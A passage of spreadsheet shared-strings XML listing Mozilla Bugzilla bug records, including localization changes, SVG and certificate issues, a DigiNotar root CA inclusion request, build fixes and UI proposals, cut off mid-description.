  <si>
    <t>smani</t>
  </si>
  <si>
    <t>eshepherd</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-372935</t>
  </si>
  <si>
    <t>ro / Romanian</t>
  </si>
  <si>
    <t>[ro] migration wizard string change</t>
  </si>
  <si>
    <t>We want to change the description of the homepage in the migration wizard
http://lxr.mozilla.org/l10n-mozilla1.8/source/ro/other-licenses/branding/firefox/brand.properties
It should look like http://lxr.mozilla.org/mozilla/source/other-licenses/branding/firefox/locales/en-US/brand.properties
The corresponding patch is the en-US part in https://bugzilla.mozilla.org/attachment.cgi?id=257411&amp;action=diff#mozilla/other-licenses/branding/firefox/locales/en-US/brand.properties_sec1
Current String in English for homePageSingleStartMain:
Firefox Start a fast search page with search results by XXX
New String:
Firefox Start a fast home page with built-in search
Please change this on trunk and prepare a patch for the branch.
See bug 372409 and bug 371309 for more information.</t>
  </si>
  <si>
    <t>iulianu</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-79139</t>
  </si>
  <si>
    <t>Danawa Korea Strict mode page has extraneous -- in the comments</t>
  </si>
  <si>
    <t xml:space="preserve">From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11 U Linux 2.2.19-2samix i686 en-US rv:0.9+)
Gecko/20010507
BuildID:    20010507
HTML comment TAG parsing error.
example
... HTML contents ...
Reproducible: Always
Steps to Reproduce:
1.open above URL
2.save page
3.edit page
4. delete -- then it is visiable but delete again -- then
  unvisiable
Actual Results:  some site is not visiable
good case :
bad case :
</t>
  </si>
  <si>
    <t>momoi</t>
  </si>
  <si>
    <t>marzio</t>
  </si>
  <si>
    <t>CORE-353334</t>
  </si>
  <si>
    <t>SVG</t>
  </si>
  <si>
    <t>[FIX]Permission denied error scripting SVG from data: URL after non-shift reload of local file</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.5) Gecko/20060731 Ubuntu/dapper-security Firefox/1.5.0.5
Build Identifier: Mozilla/5.0 (X11 U Linux i686 en-US rv:1.8.0.5) Gecko/20060731 Ubuntu/dapper-security Firefox/1.5.0.5
Using Javascript I create an object tag dynamically. The data attribute uses a data: URL scheme. The content is a bare-bones URL-encoded SVG document. I then add the object to the document get a reference to the SVG root using the documentElement property and create some SVG shapes via scripting.
If this is done from a locally-loaded file (file: URL) it will work the first time and each time you shift-reload. If you reload normally there is an error when you try to get the root element: uncaught exception: Permission denied to get property SVGDocument.documentElement. I have yet to see the same error when the file is loaded via an HTTP URL.
Reproducible: Always
Steps to Reproduce:
1. Download attachment as *local file* and load it into firefox &gt;= 1.5
2. Notice that it loads correctly when you shift-reload but not when you regular reload
Actual Results:  
uncaught exception: Permission denied to get property SVGDocument.documentElement
Expected Results:  
Should work the same regardless of how the page is reloaded.</t>
  </si>
  <si>
    <t>MOZILLA.ORG-83075</t>
  </si>
  <si>
    <t>Miscellaneous</t>
  </si>
  <si>
    <t>MOZILLA.ORG</t>
  </si>
  <si>
    <t>Quip List requested</t>
  </si>
  <si>
    <t>Is there any list of current quips?</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD-294848</t>
  </si>
  <si>
    <t>CAMINO_GRAVEYARD</t>
  </si>
  <si>
    <t>Can't override dialog warning of duplicate ssl certificate serial number</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8b2) Gecko/20050519 Camino/0.8+
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-US rv:1.8b2) Gecko/20050519 Camino/0.8+
If https is required on the built-in web server in a Linksys router it is
impossible to configure the router with Camino because Linksys apparently uses
the same certificate for all their routers. Camino gives an error which says: 
You have received an invalid certificate.  Please contact the server
administrator or email correspondent and give them the following information:
Your certificate contains the same serial number as another certificate issued
by the certificate authority.  Please get a new certificate containing a unique
serial number. 
This seems fine but then the only option is to click the OK button and use a
different browser. Firefox gives a similar warning but allows the user to
override it and accept the invalid certificate either permanently or just for
the current session.
Reproducible: Always
Steps to Reproduce:
1. Configure the built-in web server on a Linksys router to require https.
2. Attempt to connect to the router's web server with Camino
3. Silly rabbit there is no step 3.
Actual Results:  
Camino refuses to allow connections to the router.
Expected Results:  
Allow the user to override the warning and connect to the router if he or she so
choosed.</t>
  </si>
  <si>
    <t>sfraser_bugs</t>
  </si>
  <si>
    <t>bo</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS-848951</t>
  </si>
  <si>
    <t>NetOps: DC ACL Request</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS</t>
  </si>
  <si>
    <t>remove network block for the following hosts in build.scl1.mozilla.com</t>
  </si>
  <si>
    <t>These hosts in build.scl1.mozilla.com are being repurposed and are no longer staging hosts. Please remove the block on outbound access to the net blocked.  I believe these are the last of the machines that were in the untrusted zone?
talos-mtnlion-r5-002
talos-mtnlion-r5-003
talos-r3-fed-002
talos-r3-fed-010
talos-r3-fed64-001
talos-r3-fed64-002
talos-r3-w7-001
talos-r3-w7-002
talos-r3-w7-003
talos-r3-w7-010
talos-r3-xp-001
talos-r3-xp-002
talos-r3-xp-003
talos-r3-xp-010
talos-r4-lion-002
talos-r4-lion-003
talos-r4-lion-010
talos-r4-snow-001
talos-r4-snow-002
talos-r4-snow-003
talos-mtnlion-r5-001
talos-mtnlion-r5-010
talos-r3-fed-001
talos-r3-fed64-010
talos-r4-lion-001</t>
  </si>
  <si>
    <t>arzhel</t>
  </si>
  <si>
    <t>arich</t>
  </si>
  <si>
    <t>NSS-369357</t>
  </si>
  <si>
    <t>CA Certificate Root Program</t>
  </si>
  <si>
    <t>NSS</t>
  </si>
  <si>
    <t>ADD DigiNotar EV Root CA certificates</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/4.0 (compatible MSIE 7.0 Windows NT 5.1 .NET CLR 1.1.4322 .NET CLR 2.0.50727 .NET CLR 3.0.04506.30)
Build Identifier: 
DigiNotar is a trusted third party in the Netherlands issuing digital certificates. For now our main customers are based in the Netherlands. Our customers are goverment banking industry. DigiNotar is qualified against ETSI 101456 for issuing qualified electronic signatures conform EU regulations (Price Waterhouse Coopers http://www.diginotar.nl/files/etsi.pdf). As a member of the CABforum we also implement the new EV SSL standard. To do so we are also passed the WebTrust 'readiness' audit (KPMG).  
DigiNotar wants to submit the following roots
1. DigiNotar TopRoot
Description:  This is the toproot of the DigiNotar CA hierarchy.  
Download:  https://service.diginotar.nl/files/DigiNotar%20Root%20CA.crt
Thumbprint:  fe 02 91 be 1f 93 5f 42 00 36 1b dc 1b aa 2f 52 64 0f cf 55
Purposes/Usage: ALL
OID:  2.16.528.1.1001.1.1.1.1.5.2.6.4
CPS: http://www.diginotar.nl/cps
2. DigiNotar Qualified Sub CA
Description:  This is the subca for issuing qualified certificates 
Download:  http://www.diginotar.nl/Files/DigiNotar%20Qualified%20CA.crt
Thumbprint:  FFAD 0E26 F05B BCD8 063C CE1D FA60 245E 143D 5380
Purposes/Usage: ALL
CRL:  http://service.diginotar.nl/crl/root/latestCRL.crl
OCSP:  http://validation.diginotar.nl
OID:  2.16.528.1.1001.1.3.3.1.5.2.6.4
3. DigiNotar EV SSL Sub CA
Description:  This is the EV SSL SubRoot for issuing evssl certs
Download:  https://service.diginotar.nl/files/DigiNotar%20Extended%20Validation%20CA.crt
Thumbprint:  fe 02 91 be 1f 93 5f 42 00 36 1b dc 1b aa 2f 52 64 0f cf 55
Purposes/Usage: EV SSL
CRL:  http://service.diginotar.nl/crl/root/latestCRL.crl
OCSP:  http://validation.diginotar.nl
OID:  2.16.528.1.1001.1.1.1.1.5.2.6.4
4. DigiNotar Public Sub CA
Description:  This is the toproot of the DigiNotar CA hierarchy.  
Download:  http://www.diginotar.nl/rootcertificaten/DigiNotar%20Public%20CA%202025.crt
Thumbprint:  3f 01 8e 6f e3 36 09 6a 79 1b 81 e7 69 be 70 1a af 21 e3 07
Purposes/Usage: ALL
CRL:  http://service.diginotar.nl/crl/root/latestCRL.crl
OCSP:  http://validation.diginotar.nl
OID:  2.16.528.1.1001.1.1.1.1.5.2.6.4
5. DigiNotar Services Sub CA
Description:  This is the toproot of the DigiNotar CA hierarchy.  
Download:  https://service.diginotar.nl/files/DigiNotar%20Root%20CA.crt
Thumbprint:  94 32 bd 9a ec 1d 75 d1 70 5c 54 3a a3 4c 4a f6 a5 26 c1 3d
Purposes/Usage: ALL
CRL:  http://service.diginotar.nl/crl/root/latestCRL.crl
OCSP:  http://validation.diginotar.nl
OID:  2.16.528.1.1001.1.1.1.1.5.2.6.4
Microsoft will include our CA certs in the next update.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>kwilson</t>
  </si>
  <si>
    <t>k.willemse</t>
  </si>
  <si>
    <t>CORE-335058</t>
  </si>
  <si>
    <t>DOM: Core &amp; HTML</t>
  </si>
  <si>
    <t>script timeout too small in firefox</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.2) Gecko/20060409 Firefox/1.5.0.2
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8.0.2) Gecko/20060409 Firefox/1.5.0.2
We have been seeing Warning: Unresponsive Script dialog box a lot in yahoo mail beta and it happens a lot when some cpu intensive application is running on users box and they tries to check mail.
The value of dom.max_script_run_time in FF 1.5.0.2 is 5 second. It seems to be too low compare to what IE offers. Even though user can change it in about:config but it is too hard to tell millions of users to do so.
To compare it with IE:
IE timesout after executing 5000000 statements on current page.
http://support.microsoft.com/?kbid=175500
Wouldn't it be a good idea to set dom.max_script_run_time to 60 sec or
something like that in FF by default (I mean something reasonably high)? The
value of 5 sec seems to be too low.
Some of the bugs already filed on it are:
https://bugzilla.mozilla.org/show_bug.cgi?id=250841
https://bugzilla.mozilla.org/show_bug.cgi?id=330293
https://bugzilla.mozilla.org/show_bug.cgi?id=308205
https://bugzilla.mozilla.org/show_bug.cgi?id=320409
https://bugzilla.mozilla.org/show_bug.cgi?id=320020
https://bugzilla.mozilla.org/show_bug.cgi?id=320409
Reproducible: Sometimes</t>
  </si>
  <si>
    <t>jstenback+bmo</t>
  </si>
  <si>
    <t>ratan.work</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-361167</t>
  </si>
  <si>
    <t>Doctor does not find can not load rhino/history.html</t>
  </si>
  <si>
    <t>This is a followup to bug 358668 comment #13 14 16. 
Steps
1- Load provided URL
2- Click the Edit this page
Actual results
a) The content pane/area is empty and 
b) only 3 links (Edit source View edited Save changes) are shown. 
c) Even when submitting changes it fails with detailed error message as follows:
{
Doctor - Error
Doctor couldn't process your request because of the following problem:
An error occurred while committing the file: cvs commit: Up-to-date check failed for `history.html' cvs [commit aborted]: correct above errors first!
The problem occurred when Doctor tried to execute the CVS command:
CVS returned the error code 256 and the message:
cvs commit: Up-to-date check failed for `history.html'
cvs [commit aborted]: correct above errors first!
Please go back and try again. 
}</t>
  </si>
  <si>
    <t>justdave</t>
  </si>
  <si>
    <t>NSS-528741</t>
  </si>
  <si>
    <t>Libraries</t>
  </si>
  <si>
    <t>pkix_hash throws a null-argument exception on empty strings</t>
  </si>
  <si>
    <t>Created attachment 412415
Proposed patch
In libpkix an empty string is represented by a NULL buffer pointer
and a 0 buffer length.
When libpkix hashes an empty string object it throws a null-argument
exception because of a PKIX_NULLCHECK_TWO macro in pkix_hash that
null-checks the 'bytes' buffer pointer even when 'length' is 0.
The fix is to null-check the 'bytes' buffer pointer only when 'length'
is nonzero.</t>
  </si>
  <si>
    <t>wtc</t>
  </si>
  <si>
    <t>BUGZILLA-419660</t>
  </si>
  <si>
    <t>New custom fields not listed in 3.10. Custom Fields</t>
  </si>
  <si>
    <t>We implemented textarea calendar and multi-select fields in 3.2. We should list them here: http://www.bugzilla.org/docs/tip/html/custom-fields.html</t>
  </si>
  <si>
    <t>sam.folkwilliams</t>
  </si>
  <si>
    <t>MOZILLA.ORG-298645</t>
  </si>
  <si>
    <t>Repository Account Requests</t>
  </si>
  <si>
    <t>l10n CVS account request: Armeninan hy-AM (Vahe Khachikyan)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.8) Gecko/20050511 Firefox/1.0.4
The original bug for l10n registration was Bug 295834. 
I attach herein the l10n file for Deer Park Alpha 1. 
Reproducible: Always</t>
  </si>
  <si>
    <t>khachikyan</t>
  </si>
  <si>
    <t>FIREFOX-343396</t>
  </si>
  <si>
    <t>Toolbars and Customization</t>
  </si>
  <si>
    <t>Merge Reload and Stop buttons when they are adjacent</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-GB rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Build Identifier: Mozilla/5.0 (Macintosh U PPC Mac OS X Mach-O en-GB rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Firefox's toolbar has one button to stop loading a page (cross icon) and a button for reloading the page (spiral icon). The problem is that the cross icon  is displayed even if the page is not loading and the spiral icon is displayed even when the page is already loading/reloading.
I suggest to have one smart button that 
- when loading a page it shows the cross icon and stops the loading when pressed
- when the page is loaded it shows the spiral icon and reloads the page when pressed.
This allows for a more logical interface. It would also save space as the smart button replaces the two dumb buttons.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>dao+bmo</t>
  </si>
  <si>
    <t>catdogbeloved</t>
  </si>
  <si>
    <t>CORE-267611</t>
  </si>
  <si>
    <t>Networking</t>
  </si>
  <si>
    <t>get rid of malloc/copy/free sequence in nsStandardURL::Init</t>
  </si>
  <si>
    <t>Currently if |charset| is UTF-* we hit a pretty bad case for string
operations in nsStandardURL::Init.  We'll malloc a heap buffer for
mOriginCharset copy the given string into it then free the buffer once we see
that it starts with UTF.  Much better to figure that out _before_ messing with
mOriginCharset.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-123364</t>
  </si>
  <si>
    <t>English US</t>
  </si>
  <si>
    <t>musclecarworld.com - page is unreadable</t>
  </si>
  <si>
    <t>This is with mozilla 0.9.7 on linux the page in the url field is completely
unreadable because certain text overlaps other text. No page should ever render
this poorly.</t>
  </si>
  <si>
    <t>doronr</t>
  </si>
  <si>
    <t>mpalczew</t>
  </si>
  <si>
    <t>MAILNEWS_CORE-354425</t>
  </si>
  <si>
    <t>Address Book</t>
  </si>
  <si>
    <t>MAILNEWS_CORE</t>
  </si>
  <si>
    <t>Some random address book tidy ups (nsAddrDatabase/nsDirectoryDataSource)</t>
  </si>
  <si>
    <t>I've been meaning to submit these for a while - things I've found whilst coding. Patch coming up.</t>
  </si>
  <si>
    <t>standard8</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-234372</t>
  </si>
  <si>
    <t>The navigation in Yahoo Mail (Inbox Draft Sent etc links) is stretched beyond the width of the screen.</t>
  </si>
  <si>
    <t>User-Agent:       
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.6) Gecko/20040206 Firefox/0.8
The navigation part of Yahoo Mail is way wider than it is in IE.  I mean it
covers the ENTIRE screen and you have to use a highly-annoying horizontal scroll
bar at the bottom.
Reproducible: Always
Steps to Reproduce:
1. Log into Yahoo mail.
2. If the problem did not happen in the first try read a message.
3. After reading 1-2 messages it ALWAYS happens to me.
Actual Results:  
The navigation part (with inbox etc links) was very very wide.
Expected Results:  
It should have stayed neatly on the left side as the Yahoo web designers
obviously intended it to.
I'm running Mozilla Firebird (I mean Firefox) with a Feb 14th nightly build. I'm
in 1024x768 screen resolution.</t>
  </si>
  <si>
    <t>english-us</t>
  </si>
  <si>
    <t>jwdawe</t>
  </si>
  <si>
    <t>CALENDAR-279165</t>
  </si>
  <si>
    <t>Internal Components</t>
  </si>
  <si>
    <t>CALENDAR</t>
  </si>
  <si>
    <t>Cannot build Sunbird on BeOS</t>
  </si>
  <si>
    <t>General problem for both BeOS version (netserver and BONE)
is
#ifdef HAVE_STDINT_H
#include 
#endif
in mozilla/calendar/libical/src/libical/icalrecur.c  line 138.
BeOS has inttypes.h
Don't know what place is better to change configure files with check to 
AC_CHECK_HEADERS(stdint.h inttypes.h)
or just icalrecur.c file with #if defined(BeOS)
-----------
Second poblem is in libxpical and specific for BONE versions of BeOS.
mozilla/calendar/libxpical/token.c
contains
#ifdef XP_BEOS
#include 
#endif
which is OK only for netserver version.
in case of BONE version all required definitions are in standard header files
so this ifdef must be ommited.</t>
  </si>
  <si>
    <t>sergei_d</t>
  </si>
  <si>
    <t>CORE-14176</t>
  </si>
  <si>
    <t>XUL</t>
  </si>
  <si>
    <t>[xpmenus] do not update when 'value' changed via DOM APIs</t>
  </si>
  <si>
    <t>XPMenus do not seem to respond properly to ContentAppended ContentInserted
and AttributeChanged notifications. This may be a dup of 11822 but I thought
I'd log it anyway.</t>
  </si>
  <si>
    <t>hyatt</t>
  </si>
  <si>
    <t>waterson</t>
  </si>
  <si>
    <t>CORE-510410</t>
  </si>
  <si>
    <t>Widget: Cocoa</t>
  </si>
  <si>
    <t>remove remaining Carbon usage in Mac OS X native menu impl on 10.5+</t>
  </si>
  <si>
    <t>We should remove remaining Carbon usage in our Mac OS X native menu impl on 10.5+. We can't do this on 10.4 because we don't have the APIs we need. This will also make our native menu impl 64-bit ready.</t>
  </si>
  <si>
    <t>jaas</t>
  </si>
  <si>
    <t>CORE-393923</t>
  </si>
  <si>
    <t>Layout: Text and Fonts</t>
  </si>
  <si>
    <t>ASSERTION: Invalid offset and ASSERTION: aPos out of range with rtl :first-letter</t>
  </si>
  <si>
    <t>Created attachment 278484
testcase
###!!! ASSERTION: Invalid offset: 'aOffset mCharCount' file /Users/jruderman/trunk/mozilla/gfx/thebes/src/gfxSkipChars.cpp line 92
###!!! ASSERTION: aPos out of range: '0 &lt;= aPos &amp;&amp; aPos &lt; mCharacterCount' file ../../../dist/include/thebes/gfxFont.h line 563
Also none of the letters gets the first-letter style.</t>
  </si>
  <si>
    <t>jruderman</t>
  </si>
  <si>
    <t>FIREFOX-367799</t>
  </si>
  <si>
    <t>Bookmarks &amp; History</t>
  </si>
  <si>
    <t>nsNavHistory duplicates effective TLD functionality</t>
  </si>
  <si>
    <t>nsNavHistory.cpp has some functions for finding out the effective TLD of a URL (see GetTLDType and friends). This is now available as a service and we should switch to using that instead.
We might want to use the helpers proposed in bug #367446 if/when they go in.</t>
  </si>
  <si>
    <t>dwitte</t>
  </si>
  <si>
    <t>hello</t>
  </si>
  <si>
    <t>CALENDAR-363085</t>
  </si>
  <si>
    <t>Provider: ICS/WebDAV</t>
  </si>
  <si>
    <t>Not possible to enter a webdav share that requires SSLVerifyClient</t>
  </si>
  <si>
    <t>As I understand the issue this is not supported by mozilla. however firefox gives an error dialog whereas sunbird silently failes (with a javascript error:
Error: [Exception... Component returned failure code: 0x80040111
(NS_ERROR_NOT_AVAILABLE) [nsIHttpChannel.requestSucceeded]  nsresult:
0x80040111 (NS_ERROR_NOT_AVAILABLE)  location: JS frame ::
chrome://calendar/content/publish.js :: anonymous :: line 265  data: no]
Source File: chrome://calendar/content/publish.js
Line: 265
STR:
1. configure your apache WebDAV share to require SSLVerifyClient
2. try to access it (subscribe to it)
results: silent failure + javascript error</t>
  </si>
  <si>
    <t>timeless</t>
  </si>
  <si>
    <t>sebo.moz</t>
  </si>
  <si>
    <t>SEAMONKEY-203300</t>
  </si>
  <si>
    <t>fix rasdlg on MingW builds</t>
  </si>
  <si>
    <t>Rasdlg stuff is currently not working because the MingW w32api libraries
dont have the needed definitions. Once the definitions are in someone will need
to fix the mozilla code.</t>
  </si>
  <si>
    <t>dmose</t>
  </si>
  <si>
    <t>jonwil</t>
  </si>
  <si>
    <t>SEAMONKEY-76425</t>
  </si>
  <si>
    <t>MailNews: Message Display</t>
  </si>
  <si>
    <t>local folders status not updated after all mail read</t>
  </si>
  <si>
    <t>Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:0.8.1+) Gecko/20010417
I have this problem since at least 0.8
My imap mail is filtered into local folders. When I have the folder open that
the mail gets filtered in an a new message arrives the folder is marked bold
for new mail and the message gets added.
When I then read the message without changing the folder i gets correctly
market as read but the folder still remains bold. I have to go to another
folder and then come back to solve this every time.
Second problem: for one message I get the newmail sound two times once it is
added to the local folder and then when it re-appears in the imap folder (i
don't know why it appears in mozilla on the imap folder after it is copied
instead of before bot that I don't care)</t>
  </si>
  <si>
    <t>sspitzer</t>
  </si>
  <si>
    <t>spamnet</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD-324513</t>
  </si>
  <si>
    <t>Tinderbox</t>
  </si>
  <si>
    <t>WEBTOOLS_GRAVEYARD</t>
  </si>
  <si>
    <t>newly created tinderbox 404s and indexes for http://tinderbox.mozilla.org/Mozilla1.8.0-l10n-da/ URLs</t>
  </si>
  <si>
    <t>If you don't use the showbuilds.cgi?tree=Foo URLs but /Foo/ you get an index
of the directory as long as there are no builds on that box yet.
panel.html even 404s.
It should give a tree is open/closed message instead I guess.
Actually for a newly created tree the showbuilds.cgi itself doesn't mention
open or closed either.</t>
  </si>
  <si>
    <t>cls</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-269957</t>
  </si>
  <si>
    <t>Public Pages</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD</t>
  </si>
  <si>
    <t>Add Extension: rot13 encoder/decoder</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0 Mnenhy/0.6.0.104
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0 Mnenhy/0.6.0.104
The extension can be found at the given url.  It's been tested to work on the
latest Mozilla release as well as Firefox 0.8-1.0 both Linux and OS X.
It adds two items to the context menu which only appear at appropriate times. 
One lets the user paste a rot13-encoded version of text on the clipboard and
the other opens up a new window with a rot13-encoded version of the text.  
It is somewhat similar to Mnenhy but much smaller.
This extension is version 0.1.
My email is the same as account--rory@mackean.net
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>Bugzilla-alanjstrBugs</t>
  </si>
  <si>
    <t>rory</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-329935</t>
  </si>
  <si>
    <t>XForms</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD</t>
  </si>
  <si>
    <t>refresh inefficiencies with selects items</t>
  </si>
  <si>
    <t>On a single load of a simple xform with just a xf:select and a xf:itemset generating 3 items xf:select's refresh gets hit 9 times.  Looking at this issue I also noticed that the itemset is added to the deferred bind list 3 times.  So the fix to this issue needs to address why select's refresh is getting called so many times before the itemset is even done populating and also the fact that controls are added more than once to the deferred bind list.</t>
  </si>
  <si>
    <t>aaronr</t>
  </si>
  <si>
    <t>MOZILLA.ORG_GRAVEYARD-427554</t>
  </si>
  <si>
    <t>Give clouserw access to sm-devmo01</t>
  </si>
  <si>
    <t>I need to do look at devmo for mozilla.com's nutch (bug 371364) but this box doesn't seem to be ldap enabled?  I get Permission denied (publickeygssapi-with-micpassword)
Thanks.</t>
  </si>
  <si>
    <t>server-ops</t>
  </si>
  <si>
    <t>SEAMONKEY-286670</t>
  </si>
  <si>
    <t>Destination Directory of Setup Style  is broken on l10n build</t>
  </si>
  <si>
    <t>On the installer the Destination Directory label of Setup Style is broken
on l10n build.</t>
  </si>
  <si>
    <t>masayuki</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-199727</t>
  </si>
  <si>
    <t>English Other</t>
  </si>
  <si>
    <t>Site http://www.keralaguru.com/  prohibit to view in mozilla</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 rv:1.3b) Gecko/20030303 Phoenix/0.5
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 rv:1.3b) Gecko/20030303 Phoenix/0.5
Site http://www.keralaguru.com/  prohibit to view in mozilla
MozillaZine Forum Topic :  Evangelism  How to get sites to support Mozilla 
http://www.mozillazine.org/forums/viewtopic.php?p=59403&amp;highlight=#59403
More kerala sites http://www.kerals.com/portals/
Reproducible: Always
Steps to Reproduce:
1. Site http://www.keralaguru.com/  prohibit to view in mozilla
2.
3.</t>
  </si>
  <si>
    <t>english-other</t>
  </si>
  <si>
    <t>BijuMailList</t>
  </si>
  <si>
    <t>TOOLKIT-396870</t>
  </si>
  <si>
    <t>NSIS Installer</t>
  </si>
  <si>
    <t>TOOLKIT</t>
  </si>
  <si>
    <t>Add file in use uninstall support</t>
  </si>
  <si>
    <t>Created attachment 281633
patch -rev1
Since there is no reliable or for that matter convoluted way to inform the user what has a file opened during an uninstall we should delete files on OS restart when a file is in use.</t>
  </si>
  <si>
    <t>robert.strong.bugs</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-529053</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG</t>
  </si>
  <si>
    <t>[vi] 3.6 whatsnew/firstrun localization</t>
  </si>
  <si>
    <t>This bug is for the localization of the new firstrun and whatsnew pages for Firefox 3.6. 
These pages are located on a separate svn branch only for 3.6 work:
https://svn.mozilla.org/projects/mozilla.com/branches/firefox3.6/ADDYOURLOCALECODEHERE
You will first need to check out your repository example in a console for Chinese:
svn co https://svn.mozilla.org/projects/mozilla.com/branches/firefox3.6/zh-CN/ .
There are 3 pages to translate all very short you have a copy of these pages in your locale folder on svn here are the paths:
/firefox/3.6/firstrun/index.html
/firefox/3.6/whatsnew/index.html
/includes/l10n/in-product-3.6.inc.php
The last file (in-product-3.6.inc.php) is used by both firstrun and whatsnew pages.
You will find attached to bug 528943 an archive of the files to translate if you do not have SVN access. If you use the archive please attach your translations to this bug and not to bug 528943 :)
The staging site for these pages currently works for en-US so you can see what the pages will be like:
http://www-3.6.stage.mozilla.com/en-US/firefox/3.6/firstrun/
http://www-3.6.stage.mozilla.com/en-US/firefox/3.6/whatsnew/
(you need Firefox 3.6beta to display the pages correctly).
Thanks!</t>
  </si>
  <si>
    <t>pascalc</t>
  </si>
  <si>
    <t>WWW.MOZILLA.ORG-280532</t>
  </si>
  <si>
    <t>[404] link to http://www.mozilla.org/xpfe/xptoolkit/packages.html</t>
  </si>
  <si>
    <t>XUL File Preamble
----snip----
 The HTML namespace is of course the standard one. The XUL namespace is
  obviously a temporary one but at least serves to explain the pronunciation.
  Note that the above example is using an implicit XUL namespace. This is
  optional other examples in this document will on occasion belabor the
  namespace issue by declaring each use explicitly.
 The chrome protocol is another Mozilla extension allowing
  the exact location of files involved in the chrome description to be moved
  without affecting the XUL source. So it's just an indirection. Someday
  there will be a complete description of this mechanism at &lt;a
href=packages.html&gt;packages
  but for now there's a good but somewhat out of date document at &lt;a
href=../ConfigChromeSpec.html&gt;Configurable
  Chrome.</t>
  </si>
  <si>
    <t>cscibri</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-268939</t>
  </si>
  <si>
    <t>Add Extension: Farkit</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Homepage URL: http://www.fark.com/firefox/
XPI URL: http://www.fark.com/firefox/farkit-1.0.xpi
Extension Version: 1.0
OS: All platforms
Works with: Firefox .10 and 1.0
Description: Allows easy quoting of Fark.com comments
I've had a few dozen people test this on various platforms (Windows flavors
OSX Linux) and all report success.
Reproducible: Always
Steps to Reproduce:</t>
  </si>
  <si>
    <t>FarkFnord</t>
  </si>
  <si>
    <t>THUNDERBIRD-465426</t>
  </si>
  <si>
    <t>Mail Window Front End</t>
  </si>
  <si>
    <t>tabs can't restore displayed message in cross-folder saved search</t>
  </si>
  <si>
    <t>The tab code doesn't know how to display the selected message in a cross-folder saved search because this code doesn't work in cross-folder saved searches:
          var msgDB = aTab.msgSelectedFolder.getMsgDatabase(msgWindow)
          var msgHdr = msgDB.getMsgHdrForMessageID(aTab.selectedMsgId)
          setTimeout(gDBView.selectFolderMsgByKey 0 aTab.msgSelectedFolder
                     msgHdr.messageKey)
in addition to the selectedMsgId we'd need to remember the folder it belonged to (msgSelectedFolder is the saved search not the actual folder)</t>
  </si>
  <si>
    <t>CORE-227537</t>
  </si>
  <si>
    <t>XPCOM</t>
  </si>
  <si>
    <t>Make use of ELF visibility attribute</t>
  </si>
  <si>
    <t>We have the potential for a fair speedup across the board on Linux (at least
6-7% by some rough measurements) by marking most of our functions and methods as
having hidden visibility using __attribute__ ((visibility (hidden))).  In
particular we can do this for the following types of functions:
- All methods and functions which are not to be called from outside of the DSO.
- _All_ functions and methods in our XPCOM component libraries because these
are only ever called from other DSOs via vtables. (with the special exception of
NSGetModule).
What does this buy us?
- You save a trip through the PLT for each call (one load and one jump)
- If a function does not access global variables and calls only functions marked
static or hidden you save some instructions at the beginning of the function to
set up the PIC register (and you gain ebx as a general purpose register in that
function to boot).
Hidden visibility also applies to global data though the savings isn't quite as
much.
So now the question is how we could apply this to the code base with the
minimal amount of work.  There are a few possibilities:
1. A macro on each method declaration.  It could be folded into NS_IMETHOD too
but we'd want a version that doesn't declare virtual and stdcall.
2. Implement per-class visibility in gcc and use a macro on each class declaration.
3. Implement a global -fvisibility=hidden switch in gcc and explicitly mark the
